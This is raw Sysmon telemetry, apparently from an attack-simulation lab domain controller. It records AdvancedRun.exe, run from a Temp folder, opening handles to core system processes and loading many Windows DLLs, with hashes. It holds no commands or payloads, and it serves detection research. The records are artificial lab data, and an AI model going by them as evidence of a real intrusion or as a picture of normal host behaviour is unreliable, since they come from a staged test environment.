18:49:33.349{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015391Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.349{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015390Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.349{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000004015389Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.349{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004015388Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.349{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015387Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.349{834264DD-DAE4-61EA-0C00-000000002702}652752C:\Windows\system32\lsass.exe{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004015386Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.349{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015385Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015384Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015383Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015382Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015381Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015380Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015379Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015378Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015377Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015376Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015375Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015374Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015373Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015372Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015371Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015370Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015369Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015368Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015367Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015366Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015365Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015364Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015363Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015362Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015361Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015360Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015359Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015358Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015357Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015356Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015355Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 